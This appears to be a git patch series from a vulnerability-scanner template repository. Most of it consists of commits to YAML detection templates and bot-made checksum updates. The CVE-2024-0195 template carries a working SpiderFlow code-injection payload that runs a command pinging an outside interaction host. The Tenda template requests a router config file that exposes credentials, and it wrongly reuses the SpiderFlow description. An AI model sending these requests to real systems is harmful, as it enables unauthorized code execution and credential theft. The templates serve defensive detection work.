200 +# digest: 4b0a00483046022100f65be3a6050ddbda3b9523c2e10b58d2cf48ffbbd21f935a017e14dcc947acf9022100a34f8984e2df5cebba225562822b5b07470f28262216dfd247f81e9729e968a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 6964302bbde66b08699f9ea4f116a2c12f95816c Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 23 May 2024 16:37:32 +0530 Subject: [PATCH 158/847] Create CVE-2024-0195.yaml --- http/cves/2024/CVE-2024-0195.yaml | 42 +++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 http/cves/2024/CVE-2024-0195.yaml diff --git a/http/cves/2024/CVE-2024-0195.yaml b/http/cves/2024/CVE-2024-0195.yaml new file mode 100644 index 0000000000..cf2a26bb41 --- /dev/null +++ b/http/cves/2024/CVE-2024-0195.yaml @@ -0,0 +1,42 @@ +id: CVE-2024-0195 + +info: + name: SpiderFlow Crawler Platform - Remote Code Execution + author: pussycat0x + severity: critical + description: | + A vulnerability, which was classified as critical, was found in spider-flow 0.4.3. Affected is the function FunctionService.saveFunction of the file src/main/java/org/spiderflow/controller/FunctionController.java. The manipulation leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249510 is the identifier assigned to this vulnerability. + reference: + - https://github.com/Shelter1234/VulneraLab/blob/main/SpiderFlow/CVE-2024-0195/README.zh-cn.md + - https://github.com/wy876/wiki + - https://github.com/xingchennb/POC- + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-0195 + cwe-id: CWE-94 + epss-score: 0.00107 + epss-percentile: 0.43408 + cpe: cpe:2.3:a:ssssssss:spider-flow:0.4.3:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: ssssssss + product: spider-flow + fofa-query: app="SpiderFlow" + +http: + - raw: + - | + POST /function/save HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest + + id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+{{interactsh-url}}')%3B%7B + + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" From 594c949fc01a1e4512cb03d7443f03e8c6edc8d1 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 23 May 2024 16:51:12 +0530 Subject: [PATCH 159/847] Update CVE-2024-0195.yaml --- http/cves/2024/CVE-2024-0195.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-0195.yaml b/http/cves/2024/CVE-2024-0195.yaml index cf2a26bb41..c8a0ee3d6b 100644 --- a/http/cves/2024/CVE-2024-0195.yaml +++ b/http/cves/2024/CVE-2024-0195.yaml @@ -32,7 +32,7 @@ http: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest - + id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+{{interactsh-url}}')%3B%7B matchers: From b5ecce44ecc97b6b24faedb88bb346adb3b43851 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 23 May 2024 17:14:20 +0530 Subject: [PATCH 160/847] Create tendat-credential.yaml --- .../other/tendat-credential.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/vulnerabilities/other/tendat-credential.yaml diff --git a/http/vulnerabilities/other/tendat-credential.yaml b/http/vulnerabilities/other/tendat-credential.yaml new file mode 100644 index 0000000000..fe00f615e4 --- /dev/null +++ b/http/vulnerabilities/other/tendat-credential.yaml @@ -0,0 +1,32 @@ +id: tendat-credential + +info: + name: TendaT Router Credential Exposure + author: pussycat0x + severity: high + description: | + A vulnerability, which was classified as critical, was found in spider-flow 0.4.3. Affected is the function FunctionService.saveFunction of the file src/main/java/org/spiderflow/controller/FunctionController.java. The manipulation leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249510 is the identifier assigned to this vulnerability. + reference: + - https://github.com/wy876/POC/blob/main/Tenda%E8%B7%AF%E7%94%B1%E5%99%A8%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2.md + metadata: + verified: true + fofa-query: title="Tenda | LOGIN" && country="CN" + +http: + - raw: + - | + GET /cgi-bin/DownloadCfg/RouterCfm.jpg HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + + matchers-condition: and + matchers: + - type: word + words: + - "http_username" + - "device_remark" + condition: and + + - type: status + status: + - 200 From 33edf377cd5199e2ec46cc0b32c2622ce90f3185 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 23 May 2024 17:33:57 +0530 Subject: [PATCH 161/847] Update robomongo-credential.yaml --- http/exposures/configs/robomongo-credential.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposures/configs/robomongo-credential.yaml b/http/exposures/configs/robomongo-credential.yaml index eb25a0d5f3..45cc6aacdc 100644 --- a/http/exposures/configs/robomongo-credential.yaml +++ b/http/exposures/configs/robomongo-credential.yaml @@ -1,7 +1,7 @@ id: robomongo-credential info: - name: RoboMongo Configuration File - Detect + name: RoboMongo Credential Exposure author: geeknik severity: high description: A MongoDB credentials file used by RoboMongo was detected. From 2a36cb0922dae124f55c5ea2954bb2202816d2c0 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 23 May 2024 17:34:29 +0530 Subject: [PATCH 162/847] Update kyan-credential-exposure.yaml --- http/exposures/configs/kyan-credential-exposure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposures/configs/kyan-credential-exposure.yaml b/http/exposures/configs/kyan-credential-exposure.yaml index a5f3c19c03..65905cc57e 100644 --- a/http/exposures/configs/kyan-credential-exposure.yaml +++ b/http/exposures/configs/kyan-credential-exposure.yaml @@ -1,7 +1,7 @@ id: kyan-credential-exposure info: - name: Kyan Network Login Panel - Detect + name: Kyan Credential Exposure author: pikpikcu severity: medium description: Kyan Network login panel was detected. Password and other credential theft is possible via accessing this panel. From d5c2203079d85e6e379d4f9f13701a131b43626b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 23 May 2024 17:44:44 +0530 Subject: [PATCH 163/847] Update robomongo-credential.yaml --- .../configs/robomongo-credential.yaml | 20 +++++++++++-------- 1 file changed, 12 insertions(+), 8 deletions(-) diff --git a/http/exposures/configs/robomongo-credential.yaml b/http/exposures/configs/robomongo-credential.yaml index 45cc6aacdc..029b5d6c3c 100644 --- a/http/exposures/configs/robomongo-credential.yaml +++ b/http/exposures/configs/robomongo-credential.yaml @@ -1,11 +1,13 @@ id: robomongo-credential info: - name: RoboMongo Credential Exposure + name: RoboMongo Credential - Exposure author: geeknik severity: high - description: A MongoDB credentials file used by RoboMongo was detected. - reference: https://robomongo.org/ + description: | + A MongoDB credentials file used by RoboMongo was detected. + reference: + - https://robomongo.org/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -20,13 +22,10 @@ http: - "{{BaseURL}}/db/robomongo.json" - "{{BaseURL}}/robomongo.json" + stop-at-first-match: true + matchers-condition: and matchers: - - type: word - part: header - words: - - "application/json" - - type: word words: - "databaseName" @@ -35,6 +34,11 @@ http: - "serverHost" condition: and + - type: word + part: header + words: + - "application/json" + - type: status status: - 200 From 7895921867c6384ebbb0aa73bfb00b5dfda9794d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 23 May 2024 17:45:15 +0530 Subject: [PATCH 164/847] Update kyan-credential-exposure.yaml --- http/exposures/configs/kyan-credential-exposure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposures/configs/kyan-credential-exposure.yaml b/http/exposures/configs/kyan-credential-exposure.yaml index 65905cc57e..9de83418c6 100644 --- a/http/exposures/configs/kyan-credential-exposure.yaml +++ b/http/exposures/configs/kyan-credential-exposure.yaml @@ -1,7 +1,7 @@ id: kyan-credential-exposure info: - name: Kyan Credential Exposure + name: Kyan Credential - Exposure author: pikpikcu severity: medium description: Kyan Network login panel was detected. Password and other credential theft is possible via accessing this panel. From c783d96af722e869d54739e58253db97d0839b24 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 12:17:39 +0000 Subject: [PATCH 165/847] Auto Generated New Template Addition List [Thu May 23 12:17:39 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index cae8693827..8f5bb60413 100644 --- a/.new-additions +++ b/.new-additions @@ -35,6 +35,7 @@ http/misconfiguration/installer/custom-xoops-installer.yaml http/misconfiguration/installer/easy-viserlabs-installer.yaml http/misconfiguration/installer/forgejo-installer.yaml http/misconfiguration/installer/froxlor-installer.yaml +http/misconfiguration/installer/growi-installer.yaml http/misconfiguration/installer/ids-skills-installer.yaml http/misconfiguration/installer/moosocial-installer.yaml http/misconfiguration/installer/octoprint-installer.yaml From 13db02e8edffcc596d7078bfa4c543d85068b566 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 12:17:58 +0000 Subject: [PATCH 166/847] Auto Generated Templates Checksum [Thu May 23 12:17:58 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7bffb4c71f..69352264ee 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4727,7 +4727,7 @@ http/exposures/configs/rackup-config-ru.yaml:94f7f7fc3cc26030ca1630f9d782eeeb7d1 http/exposures/configs/rails-database-config.yaml:b02dca967dbd26612f29e13205e41e8377670897 http/exposures/configs/rakefile-disclosure.yaml:40d258c4d79613a96e9e09bfb1c940755956546b http/exposures/configs/redis-config.yaml:91875ce839649f48da4ed29d68a72f2c1ee5a1e8 -http/exposures/configs/robomongo-credential.yaml:5798cce171c0a0763983e954747483a4b25e34f6 +http/exposures/configs/robomongo-credential.yaml:af056f027abbdab368dbaed618eb3ba20581dbb3 http/exposures/configs/rollup-js-config.yaml:8f2034228d8e39391f1527030b8887cb95c8d012 http/exposures/configs/rubocop-config.yaml:c4f570275da1ebe7f348c6a77006c6d26d06e711 http/exposures/configs/ruijie-information-disclosure.yaml:8b2cde25db83e7d577878b09ef7dca415fab1046 @@ -5418,7 +5418,7 @@ http/misconfiguration/installer/getsimple-installation.yaml:5673a1203b9080ff329c http/misconfiguration/installer/gibbon-installer.yaml:c22815fca903475c70deeecb36bb5ca4bdde2283 http/misconfiguration/installer/gitea-installer.yaml:5e6a8a0d61e3cf52bdaeb96c7a1784a046292e7e http/misconfiguration/installer/gogs-installer.yaml:761e7ee7354915c029670f36c1360b8d8bb97a4d -http/misconfiguration/installer/growi-installer.yaml:743890ea534f511369a9d5e86d361189ac9e240b +http/misconfiguration/installer/growi-installer.yaml:4deae8663c130d2b6fa7d6c62da70b3474c2efb3 http/misconfiguration/installer/ids-skills-installer.yaml:ff7fee92596ae2212f48a0b75bfce6defd2f8baa http/misconfiguration/installer/impresspages-installer.yaml:a202181818bcfe8005a744f81027dc06de05dc40 http/misconfiguration/installer/imprivata-installer.yaml:876cea672f3efc0085a779a6d8c9305c994a2ea3 @@ -8556,7 +8556,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:389baee3ddcffef703e3fd7ecba20ec318c44aa8 +templates-checksum.txt:627e7da79707c2c86dfef54ba9353e342fbb82db wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 50b272704400859ae6c4b5ce70be69f65f787086 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 12:18:19 +0000 Subject: [PATCH 167/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 1db8682e6e..cfc66bd726 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -40,6 +40,7 @@ on: - 'http/misconfiguration/installer/easy-viserlabs-installer.yaml' - 'http/misconfiguration/installer/forgejo-installer.yaml' - 'http/misconfiguration/installer/froxlor-installer.yaml' + - 'http/misconfiguration/installer/growi-installer.yaml' - 'http/misconfiguration/installer/ids-skills-installer.yaml' - 'http/misconfiguration/installer/moosocial-installer.yaml' - 'http/misconfiguration/installer/octoprint-installer.yaml' From adaf6da3aa43b413c21dd5eea4b08006e53475fc Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 12:18:31 +0000 Subject: [PATCH 169/847] Auto Generated Templates Checksum [Thu May 23 12:18:31 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 69352264ee..0fe3d41f5c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4684,7 +4684,7 @@ http/exposures/configs/jsconfig-json.yaml:2b4eef2963c707feef05c1953816da94d1a331 http/exposures/configs/karma-config-js.yaml:0ef25cc1986c133be7cba2144ecd6cc287c3c4b9 http/exposures/configs/keycloak-openid-config.yaml:42ffdd485eb9de21b1cfdc3c631e384151ad5281 http/exposures/configs/kubernetes-kustomization-disclosure.yaml:eb652b556472ef31b9d25b651c66780796ef87fa -http/exposures/configs/kyan-credential-exposure.yaml:361f8767da9a8f50f3dd85a8f04a7c228badcac2 +http/exposures/configs/kyan-credential-exposure.yaml:8fa3cc4b02e0d50fd78a3a033d8fd799d17af82e http/exposures/configs/laravel-env.yaml:f3071adfe9141a9fdf4b7ddf913a1b05118ab9d0 http/exposures/configs/lvmeng-uts-disclosure.yaml:cc8d43b2cd08dc0ba883f385679681598ec373b2 http/exposures/configs/magento-config-disclosure.yaml:c7ed206ff84ae43bb9bbae4ddbc8e5354558076a @@ -8556,7 +8556,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:627e7da79707c2c86dfef54ba9353e342fbb82db +templates-checksum.txt:1b6bff8175b179836c5ac85910f593e2d559d909 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 0c4bce54ae870e51ddbe954bd5176214da60f94d Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 12:19:25 +0000 Subject: [PATCH 170/847] Auto Template Signing [Thu May 23 12:19:25 UTC 2024] :robot: --- http/exposures/configs/robomongo-credential.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/exposures/configs/robomongo-credential.yaml b/http/exposures/configs/robomongo-credential.yaml index 029b5d6c3c..d4d0eaa379 100644 --- a/http/exposures/configs/robomongo-credential.yaml +++ b/http/exposures/configs/robomongo-credential.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100a091fec38f4647a645665c8ba770105c82fd3c1e4c83b22074900e112e73a44f022100e3836c37d83ecae0eca80a9c63b2ec583a711c0c2fa3fc33a0d584b643bf39dc:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ec83814bf87d0df0c3d2fdda4ed2be1b96cbb72daeee2aeb81f148c0b61f8bdb0220752c79df054df4bb24b5f756d21d318b0adcfbc7cee148e412b0ade02cd8ebcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 8062ccd219843eb4a71710e90e339cae9b00a480 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 23 May 2024 17:50:39 +0530 Subject: [PATCH 171/847] updated matchers --- .../other/tendat-credential.yaml | 18 +++++++----------- 1 file changed, 7 insertions(+), 11 deletions(-) diff --git a/http/vulnerabilities/other/tendat-credential.yaml b/http/vulnerabilities/other/tendat-credential.yaml index fe00f615e4..fb861b702d 100644 --- a/http/vulnerabilities/other/tendat-credential.yaml +++ b/http/vulnerabilities/other/tendat-credential.yaml @@ -1,7 +1,7 @@ id: tendat-credential info: - name: TendaT Router Credential Exposure + name: Tendat Router Credential - Exposure author: pussycat0x severity: high description: | @@ -11,22 +11,18 @@ info: metadata: verified: true fofa-query: title="Tenda | LOGIN" && country="CN" + tags: tendat,exposure,config http: - raw: - | GET /cgi-bin/DownloadCfg/RouterCfm.jpg HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate - matchers-condition: and matchers: - - type: word - words: - - "http_username" - - "device_remark" + - type: dsl + dsl: + - 'contains_all(body, "http_username", "device_remark")' + - 'contains(header, "config/conf")' + - 'status_code == 200' condition: and - - - type: status - status: - - 200 From b71e994bdc59f9355f40b1476634eac5c3de5623 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 12:24:54 +0000 Subject: [PATCH 172/847] Auto Generated New Template Addition List [Thu May 23 12:24:54 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 8f5bb60413..6fcf5e4107 100644 --- a/.new-additions +++ b/.new-additions @@ -57,4 +57,5 @@ http/technologies/tinyproxy-detect.yaml http/technologies/uni-gui-framework.yaml http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml http/vulnerabilities/other/castel-digital-sqli.yaml +http/vulnerabilities/other/tendat-credential.yaml javascript/enumeration/checkpoint-firewall-enum.yaml From ce93b053d5d0a0aa58dd5b5785c5b23b6c30f890 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 12:25:00 +0000 Subject: [PATCH 173/847] Auto Generated Templates Checksum [Thu May 23 12:25:00 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 0fe3d41f5c..387c549bd8 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4727,7 +4727,7 @@ http/exposures/configs/rackup-config-ru.yaml:94f7f7fc3cc26030ca1630f9d782eeeb7d1 http/exposures/configs/rails-database-config.yaml:b02dca967dbd26612f29e13205e41e8377670897 http/exposures/configs/rakefile-disclosure.yaml:40d258c4d79613a96e9e09bfb1c940755956546b http/exposures/configs/redis-config.yaml:91875ce839649f48da4ed29d68a72f2c1ee5a1e8 -http/exposures/configs/robomongo-credential.yaml:af056f027abbdab368dbaed618eb3ba20581dbb3 +http/exposures/configs/robomongo-credential.yaml:e01f62310eddcfe819e9429da38459af9f6c5dd6 http/exposures/configs/rollup-js-config.yaml:8f2034228d8e39391f1527030b8887cb95c8d012 http/exposures/configs/rubocop-config.yaml:c4f570275da1ebe7f348c6a77006c6d26d06e711 http/exposures/configs/ruijie-information-disclosure.yaml:8b2cde25db83e7d577878b09ef7dca415fab1046 @@ -7925,6 +7925,7 @@ http/vulnerabilities/other/talroo-jobs-xss.yaml:34af231d34704c63a01bbeba21bc7174 http/vulnerabilities/other/tamronos-rce.yaml:0f057fdf03116f53c69573789145ff009573a639 http/vulnerabilities/other/tamronos-user-creation.yaml:2c73bb0f38c1ef165578c00832d316ed40faeefe http/vulnerabilities/other/tekon-info-leak.yaml:78521259191534295b7ea481980c2adee69a17ab +http/vulnerabilities/other/tendat-credential.yaml:718813e1e5a830afbff9241402d3813dfbd64f28 http/vulnerabilities/other/thinkific-redirect.yaml:251ca37bf18bf81069db0b137edd2afa0d0e4f58 http/vulnerabilities/other/thruk-xss.yaml:b6bd8aac6da2278ad8142ee74120625d3309fe4f http/vulnerabilities/other/tianqing-info-leak.yaml:bfe5a313b8c2fad5722b13e933fe3b65bc0eb89e @@ -8556,7 +8557,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:1b6bff8175b179836c5ac85910f593e2d559d909 +templates-checksum.txt:f3f365d17a887e4be9b351392082b92297401162 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 66e297c8fd381cec7c19ef8afafe26a9b9393cd5 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 12:25:35 +0000 Subject: [PATCH 174/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index cfc66bd726..3b5dbac81c 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -62,6 +62,7 @@ on: - 'http/technologies/uni-gui-framework.yaml' - 'http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml' - 'http/vulnerabilities/other/castel-digital-sqli.yaml' + - 'http/vulnerabilities/other/tendat-credential.yaml' - 'javascript/enumeration/checkpoint-firewall-enum.yaml' workflow_dispatch: jobs: From 6efa0ced6f6eafc22ba81504477310d804983976 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 12:26:48 +0000 Subject: [PATCH 175/847] Auto Template Signing [Thu May 23 12:26:48 UTC 2024] :robot: --- http/exposures/configs/kyan-credential-exposure.yaml | 3 +-- http/vulnerabilities/other/tendat-credential.yaml | 1 + 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposures/configs/kyan-credential-exposure.yaml b/http/exposures/configs/kyan-credential-exposure.yaml index 9de83418c6..8cd0db3117 100644 --- a/http/exposures/configs/kyan-credential-exposure.yaml +++ b/http/exposures/configs/kyan-credential-exposure.yaml @@ -36,5 +36,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022021dd759f02a17681a9dba7ffa13df823c17fe69e943fc1b5c3987893d2492242022100fafe44ac4b37b58b98512d37eb32bf13ee774a2c425537ab814a0710bd81267e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a053c50c1498293195c2bde12324cbf1b0b5250abcd8d59ffd1ed275198944c90220623209957cbd63440cbd204fc4a40e731cefa0d319c0531594a2ee51ef4b0472:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/tendat-credential.yaml b/http/vulnerabilities/other/tendat-credential.yaml index fb861b702d..3fbbda7fe7 100644 --- a/http/vulnerabilities/other/tendat-credential.yaml +++ b/http/vulnerabilities/other/tendat-credential.yaml @@ -26,3 +26,4 @@ http: - 'contains(header, "config/conf")' - 'status_code == 200' condition: and +# digest: 4a0a00473045022009aff9d412e592f419c34a053f2e0dd2e271dfb1b8201d7e3a8e658155acd843022100e816bae0e0e3e82dc102fb1cf9b8f7a3452c55b47dfa9c0ec4cadb13c423ad37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 81fe704a0e93d7f35164fac12638687bb02fb2c2 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 23 May 2024 18:15:41 +0530 Subject: [PATCH 176/847] Update CVE-2024-0195.yaml --- http/cves/2024/CVE-2024-0195.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-0195.yaml b/http/cves/2024/CVE-2024-0195.yaml index c8a0ee3d6b..42561d03f0 100644 --- a/http/cves/2024/CVE-2024-0195.yaml +++ b/http/cves/2024/CVE-2024-0195.yaml @@ -24,6 +24,7 @@ info: vendor: ssssssss product: spider-flow fofa-query: app="SpiderFlow" + tags: cve,cve2024,spiderflow http: - raw: From 3ae722960fff74d21ba443488dd5e8252537966c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 23 May 2024 18:19:04 +0530 Subject: [PATCH 177/847] Update CVE-2024-0195.yaml --- http/cves/2024/CVE-2024-0195.yaml | 23 ++++++++++++++++++----- 1 file changed, 18 insertions(+), 5 deletions(-) diff --git a/http/cves/2024/CVE-2024-0195.yaml b/http/cves/2024/CVE-2024-0195.yaml index 42561d03f0..5da0534c4c 100644 --- a/http/cves/2024/CVE-2024-0195.yaml +++ b/http/cves/2024/CVE-2024-0195.yaml @@ -8,15 +8,15 @@ info: A vulnerability, which was classified as critical, was found in spider-flow 0.4.3. Affected is the function FunctionService.saveFunction of the file src/main/java/org/spiderflow/controller/FunctionController.java. The manipulation leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249510 is the identifier assigned to this vulnerability. reference: - https://github.com/Shelter1234/VulneraLab/blob/main/SpiderFlow/CVE-2024-0195/README.zh-cn.md - - https://github.com/wy876/wiki - - https://github.com/xingchennb/POC- + - https://vuldb.com/?id.249510 + - https://nvd.nist.gov/vuln/detail/CVE-2024-0195 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-0195 cwe-id: CWE-94 epss-score: 0.00107 - epss-percentile: 0.43408 + epss-percentile: 0.43423 cpe: cpe:2.3:a:ssssssss:spider-flow:0.4.3:*:*:*:*:*:*:* metadata: verified: true @@ -24,9 +24,22 @@ info: vendor: ssssssss product: spider-flow fofa-query: app="SpiderFlow" - tags: cve,cve2024,spiderflow + tags: cve,cve2024,spiderflow,crawler,unauth,rce + +flow: http(1) && http(2) http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'SPIDER_FLOW_VERSION' + - raw: - | POST /function/save HTTP/1.1 @@ -40,4 +53,4 @@ http: - type: word part: interactsh_protocol words: - - "dns" + - "http" From ef3e4afa7ad016d187700c25101aec1eb6f0e511 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 23 May 2024 18:20:05 +0530 Subject: [PATCH 178/847] dns update --- http/cves/2024/CVE-2024-0195.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-0195.yaml b/http/cves/2024/CVE-2024-0195.yaml index 5da0534c4c..c458ad3cd3 100644 --- a/http/cves/2024/CVE-2024-0195.yaml +++ b/http/cves/2024/CVE-2024-0195.yaml @@ -53,4 +53,4 @@ http: - type: word part: interactsh_protocol words: - - "http" + - "dns" From 54ea151038db5e62fcb423b958729e9432947b9a Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 12:53:01 +0000 Subject: [PATCH 179/847] Auto Generated New Template Addition List [Thu May 23 12:53:00 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 6fcf5e4107..74817b2587 100644 --- a/.new-additions +++ b/.new-additions @@ -9,6 +9,7 @@ http/cves/2023/CVE-2023-4542.yaml http/cves/2023/CVE-2023-45855.yaml http/cves/2023/CVE-2023-5991.yaml http/cves/2023/CVE-2023-6065.yaml +http/cves/2024/CVE-2024-0195.yaml http/cves/2024/CVE-2024-0200.yaml http/cves/2024/CVE-2024-1561.yaml http/cves/2024/CVE-2024-3097.yaml From 24319535618f31c767e5d4cad7102c232a7bc2db Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 12:53:05 +0000 Subject: [PATCH 180/847] Auto Generated Templates Checksum [Thu May 23 12:53:05 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 387c549bd8..ccc9a418c4 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3236,6 +3236,7 @@ http/cves/2023/CVE-2023-6909.yaml:4562cfd57e05ece355b437b64b4925db7a04472f http/cves/2023/CVE-2023-6977.yaml:427980251fa5fcdbdfa28dceed9f7fd1e0c17158 